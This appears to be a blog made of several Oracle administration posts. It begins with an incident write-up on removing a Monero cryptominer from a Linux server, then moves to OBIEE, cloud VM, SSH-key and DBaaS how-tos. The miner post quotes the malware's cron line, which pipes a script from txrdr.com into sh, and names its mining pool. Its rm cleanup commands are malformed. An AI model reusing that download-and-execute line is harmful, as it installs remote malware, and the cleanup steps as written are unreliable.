Lady.B Malware! CryptoMiner

Recently I had a requirement to check the performance of a linux server.

A very strange job was starting over and over again no matter the times I killed it. This job was consuming a high percentage of cpu.

After a several commands for checking the origin of this job. I found the following A CryptoMiner malware infected the system.

The malware specializes in Mining relatively new cryptocurrency Monero (XMR). This is not only a new currency with a little difficulty, but the attackers for some reason chose it.

The malware checks the version of the system - and adds the appropriate executable file to AutoRun.

"stratum+tcp://monero.crypto-pool.fr:3333"

More detail here:

https://steemit.com/steemit/@whitemike313/crypto-miner-has-infected-thousands-of-nas-in-the-world

Well the steps I did to get rid of this malware:

1.- Stop all the communication to their servers.

sudo chkconfig iptables on

sudo iptables -A INPUT -s xmr.crypto-pool.fr -j DROP
sudo iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP
sudo iptables -A INPUT -s txrdr.com -j DROP
sudo iptables -A OUTPUT -d txrdr.com -j DROP

sudo service iptables save

sudo service iptables status


txrdr.com (this one, I found it in a cron file)

2.- Delete tmp files

/tmp/rm -rf .*
/tmp/rm -rf

3.- Delete oracle cron file
/var/spool/cron/oracle

Or remove its contents
In my case (*/1 * * * * curl txrdr.com/sitecontent/S6-WEB.jpg|sh;)

4.- Restart as many times as you required in order to see the process is not starting

5.- Check if you need to have cron running, otherwise stop it using /etc/init.d/crond stop.

This process is not going to clean completely the system but is going to block all the communications and avoid the cron job regenerates the source of the malware, thus the job is not going to start if the connection is not established succesfully.

Well done bad guys!!

Install and configure Admin Tool with OBIEE 12C - IAAS Cloud

First of all you need to install the client required, the file:

Setup_BI_Client_12.2.1.0.0_Windows.X64

you can download it en the oracle web page, or e-delivery.

http://download.oracle.com/otn/nt/bi/1221/Setup_BI_Client_12.2.1.0.0_Windows.X64.zip

once you have installed, we proceed to configure it in order to allow connection,

we need first, configure tnsnames.ora.

1.- Navigate to C:\Oracle\Middleware\Oracle_Home\network\admin
(if the folder doesn't exist create it)

2.- Create file tnsnames.ora pointing out to the database you want to connect.

example:

# tnsnames.ora Network Configuration File mntopc_dataproduct12.1.0db_1networkadmintnsnames.ora
# Generated by Oracle configuration tools.

CLOUDCDB1 =
  (DESCRIPTION =
    (ADDRESS = (PROTOCOL = TCP)(HOST = db_private)(PORT = 1521))
    (CONNECT_DATA =
      (SERVER = DEDICATED)
      (SERVICE_NAME = cloudcdb1)
    )
  )

CLOUDCDB1_PDB =
  (DESCRIPTION =
    (ADDRESS = (PROTOCOL = TCP)(HOST = db_private)(PORT = 1521))
    (CONNECT_DATA =
      (SERVER = DEDICATED)
      (SERVICE_NAME = pdborcl)
    )
  )

3.- Configure DNS System Entries

The port 9514

4.- Select the tables as you desire and build your model

Create Windows VM on Oracle Cloud Compute

1. Log in to Oracle Cloud Marketplace at https://cloud.oracle.com/marketplace/faces/homePage.jspx.
2. From the Products drop-down list, select Infrastructure (IaaS), and then select Compute Cloud.
3. Enter the name of the image that you want to use in the Search bar at the top of the page and click Go.
4. The search results are displayed.
5. Select the image that you want to use by clicking it.
6. You’re directed to a page with more information for the selected image.
7. Click Get App.
8. Accept the terms of use and click Next
9. If you see a message asking you to enable permission settings by clicking Preferences in your Oracle Compute Cloud Service account, follow the instructions to enable the setting. Then return to Oracle Cloud Marketplace and click Get App for your image again.
10. Select the required account from the drop-down list and click Next.
11. Review the information on the Review screen and click Submit Request.
12. You’ll receive an email notification confirming that your application has been installed.
13. On the Confirmation screen, after your request is confirmed, to create an instance, click Start Compute Console.
14. The Create Instance wizard starts.

This app requires Oracle Compute Cloud Service . Also, to install this app, you must be a service administrator for your Oracle Compute Cloud Service.

We can't continue with the installation because we can't verify that you have the Oracle Cloud services required for this app.

To give us permission to verify your services: 

1. • 1.Sign in to the My Services application.
2. • 2.Click Preferences at the top of the page.
3. • 3.Select the Permission Settings check box.

Once this option is set, we can verify that your Oracle Cloud services meet the requirements for any app you choose to install.

After you set the option, sign in to Oracle Cloud Marketplace, find the app you wanted to install, and click Get App to restart the process.

Generating SSH Key DBAAS

With puttygen tool you can create your private, public, and open ssh keys for Cloud instances, here the procedure:

1.- Open tool



2.- Select SSH-2 RSA



3- Bits:



4- Generate:


5- Draw stg for randomness



6.- Copy key



7.- Set the key pass phrase to create a private key



There is no way to recover a passphrase if you forget it.



8.- Save it (PPK Extension)


9.- If you need to create a compatible SSH key for commands, export it as open ssh.



10.- Create public key by copy-paste the content of the generated key,point 6, in a txt file and save it.

Note: Not the private key






More information:

http://www.oracle.com/webfolder/technetwork/tutorials/obe/cloud/dbaas/obe_dbaas_QS/oracle_database_cloud_service_dbaas_quick_start.html#section1

Access DBAAS through SSH

Sometimes you are required to enter to a machine node to make some administrative tasks, you cannot do in web consoles, so you need to enter with SSH.

With a client like MobaXterm, Putty, or whatever SSH Client you have do the following

Remote Host: Here you put the public ip
User: oracle | opc

oracle for common administrative tasks
opc user if you need root privilege using sudo command

Port: Use the default (22)

In auth section use the private key that you create when you configured your database service, you create 3 keys:

1.- Private Key
2.- Public Key
3.- SSH Key

Here you select your private key

Click in OK

Click in connect session







There you go ! 

DBAAS Useful Links

Here I share useful links when you have provisioned with database as a service:

The main requirements is that you have DB Enterprise Edition and service and listeners up and running:

Links:

EM
https://public-ip:5500/em/shell#/config/show_params
system/pwd

Database Monitor
https://public-ip/dbaas_monitor/
DBAAS_MONITOR/pwd

APEX
https://public-ip/ords/pdb1/f?p=4050:3:8030913058308:::::

INTERNAL (always)
ADMIN/pwd

GlassFish
https://public-ip:4848/common/index.jsf
admin/pwd

Make sure you have database instance up and running

For instance:

https://dbaas.oraclecloud.com/dbaas/faces/dbRunner.jspx username and password provided when Oracle granted your access.

And also in Compute Services.

https://computeui.us.oraclecloud.com/mycompute/faces/instances.jspx

Check if Instance and Network services are up and runnig.

If not restart the network services in update option

There you go!

Overview Business Intelligence Cloud Service

Oracle has driven BI Cloud strongly, that's why I share you a very good link if you want to learn about BI Cloud Service

Main topics:

Explore Data in Visual Analyzer Projects
View Reports in Dashboards and Analyses
Getting Started with Analyses
Getting Started with Dashboards
Prepare Data and Models for Exploration and Reporting
Getting Started with Data Loading
Getting Started with Data Modeling
Manage Your BI Cloud Service

https://docs.oracle.com/cloud/latest/reportingcs_use/reportingcs_tutorials.htm